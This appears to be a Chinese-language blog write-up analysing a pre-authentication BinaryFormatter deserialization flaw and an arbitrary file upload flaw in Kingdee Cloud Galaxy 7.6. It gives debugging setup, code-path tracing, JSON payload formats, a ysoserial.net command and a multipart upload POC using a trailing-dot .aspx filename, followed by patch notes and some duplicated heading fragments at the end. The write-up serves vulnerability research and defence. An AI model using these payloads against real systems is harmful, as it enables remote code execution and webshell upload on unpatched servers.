某云星空前台反序列化和任意文件上传漏洞分析<\/h1>

环境搭建<\/h2>

所需环境<\/h3>

操作系统：Windows Server 2012<\/li>
软件版本：金蝶云星空 7.6<\/li>

建议使用云服务器或纯净虚拟机进行搭建<\/li> <\/ul>

调试工具<\/h3>

dnSpy调试工具（推荐使用v6.1.8 win64版本）

下载地址：https:\/\/github.com\/dnSpy\/dnSpy\/releases\/tag\/v6.1.8<\/li> <\/ul> <\/li> <\/ul>

调试环境配置<\/h3>

添加系统环境变量：COMPLUS_ZapDisable = 1<\/code><\/li>

调试IIS进程：

进入C:\Windows\System32\inetsrv<\/code>目录<\/li>
执行appcmd list wp<\/code>查看应用程序池进程ID<\/li>
<\/ul>
<\/li>
使用dnSpy附加进程：

打开dnSpy，选择"调试"->"附加到进程"<\/li>
选择相应的进程ID并附加<\/li>
在"调试"->"窗口"->"模块"中搜索要调试的程序集<\/li>
双击程序集，在程序集资源管理器中找到要调试的类并打断点<\/li>
<\/ul>
<\/li>
<\/ol>
反序列化漏洞分析<\/h2>
漏洞入口<\/h3>

源码位置：C:\Program Files (x86)\Kingdee\K3Cloud\WebSite<\/code><\/li>
web.config配置文件中，.kdsvc<\/code>后缀文件由KDServiceHandler<\/code>处理

处理类：Kingdee.BOS.ServiceFacade.KDServiceFx.KDServiceHandler,Kingdee.BOS.ServiceFacade.KDServiceFx<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
请求处理流程<\/h3>

KDServiceHandler<\/code>返回KSDVHandler<\/code>处理请求<\/li>
KSDVHandler<\/code>在ProcessRequest<\/code>方法中处理请求<\/li>
通过Action<\/code>类进入ProcessRequestInternal<\/code><\/li>
进入ExecuteRequest<\/code>方法<\/li>
进入StartRequest<\/code><\/li>
进入BeginRequest<\/code>方法处理会话session<\/li>
调用RequestExcuteRuntime.pipeline.ExcuteRequest(kdserviceContext)<\/code><\/li>
最终调用ExecuteServiceModule<\/code>的OnProcess<\/code>方法<\/li>
<\/ol>
关键点分析<\/h3>
1. GetServiceParameters()<\/h4>

requestExtractor<\/code>在KDSVCHandler#ProcessRequest<\/code>中通过Create()<\/code>方法初始化<\/li>
将JSON body参数转换为key-value的form

如果Content-Type: text\/json<\/code>，使用JQueryRequestExtractor<\/code>转换<\/li>
否则直接作为key-value的form<\/li>
<\/ul>
<\/li>
<\/ul>
参数获取方式：<\/p>

如果POST参数中有parameters<\/code>，获取后变成JSON数组

Payload示例：{"format": 3, "parameters": "[\"gadget\"]"}<\/code><\/li>
<\/ul>
<\/li>
否则参数可以为pparams<\/code>或ap0<\/code>形式

Payload示例：{"ap0":"gadget","format":"3"}<\/code><\/li>
或：{"pparams":"gadget","format":"3"}<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
2. new SerializerProxy()<\/h4>

根据传入的format<\/code>选择对应的SerializerProxy<\/code>（JSON或Binary）<\/li>
format=3<\/code>对应BinaryFormatterProxy<\/code><\/li>
<\/ul>
3. this.executor.Execute()<\/h4>

调用相应的serializer进行反序列化<\/li>
使用BinaryFormatterProxy<\/code><\/li>
this.encoder.Decoding<\/code>支持多种编码方式（Base64或Hex）<\/li>
<\/ul>
漏洞复现<\/h3>
使用ysoserial.net生成payload：<\/p>
ysoserial.exe -o base64 -f BinaryFormatter -g ClaimsIdentity -c "cmd \/c \"ping xxxx\""
<\/code><\/pre>
补丁分析<\/h3>
补丁直接禁用了二进制序列化方式<\/p>
任意文件上传漏洞分析<\/h2>
漏洞位置<\/h3>

处理类：ScpSupRegHandler<\/code>（继承IHttpHandler<\/code>接口）<\/li>
配置文件位置：\WebSite\App_Data\Common.config<\/code><\/li>
配置文件加载：通过FileConfig.xml.deploy<\/code>加载Common.config<\/code><\/li>
<\/ul>
漏洞分析流程<\/h3>

ScpSupRegHandler<\/code>的ProcessRequest<\/code>方法处理路由<\/li>
如果是POST方法且是文件上传格式，进入SavaAttach<\/code>方法<\/li>
在SavaAttach<\/code>方法中：

context.Request.Files[0]<\/code>获取HTTP请求中的第一个文件<\/li>
Path.GetExtension(httpPostedFile.FileName)<\/code>获取文件扩展名

处理方式：去掉点号，转换为小写<\/li>
例如：test.aspx.txt<\/code>取.txt<\/code>，test.aspx.<\/code>取空字符串<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
检查扩展名："abc".Contains(value)<\/code>

当value为空时，字符串包含空，可绕过检查<\/li>
<\/ul>
<\/li>
需要添加FID<\/code>和dbId_v<\/code>参数<\/li>
文件上传时利用Windows特性：

文件名中的..\/<\/code>可进行路径遍历<\/li>
Windows会删除文件名最后的点号<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用技巧<\/h3>

文件扩展名检查使用Contains<\/code>方法，空扩展名可绕过<\/li>
利用Windows处理文件名时删除最后点号的特性<\/li>
<\/ol>
POC示例<\/h3>
POST \/路径 HTTP\/1.1
Host: target
Content-Type: multipart\/form-data; boundary=----WebKitFormBoundaryxxxx

------WebKitFormBoundaryxxxx
Content-Disposition: form-data; name="FID"

任意值
------WebKitFormBoundaryxxxx
Content-Disposition: form-data; name="dbId_v"

任意值
------WebKitFormBoundaryxxxx
Content-Disposition: form-data; name="file"; filename="test.aspx."
Content-Type: application\/octet-stream

恶意文件内容
------WebKitFormBoundaryxxxx--
<\/code><\/pre>
总结<\/h2>
反序列化漏洞要点<\/h3>

路由通用性：只要能进入KDSVCHandler<\/code>的路由都可利用<\/li>
JSON参数格式灵活：parameters<\/code>、pparams<\/code>或ap0<\/code>均可<\/li>
编码方式多样：支持Base64和Hex编码<\/li>
请求格式：支持JSON格式和常规POST参数<\/li>
<\/ol>
文件上传漏洞要点<\/h3>

利用Contains<\/code>方法检查扩展名的缺陷<\/li>
利用Windows处理文件名的特性<\/li>
需要配合FID<\/code>和dbId_v<\/code>参数<\/li>
<\/ol>
这两个漏洞的组合利用可以实现在目标系统上执行任意代码和上传恶意文件，危害性较高。<\/p>

某云星空前台反序列化和任意文件上传漏洞分析<\/h1>

环境搭建<\/h2>

反序列化漏洞分析<\/h2>

关键点分析<\/h3>

补丁分析<\/h3> 补丁直接禁用了二进制序列化方式<\/p>

任意文件上传漏洞分析<\/h2>

总结<\/h2>

补丁分析<\/h3>
补丁直接禁用了二进制序列化方式<\/p>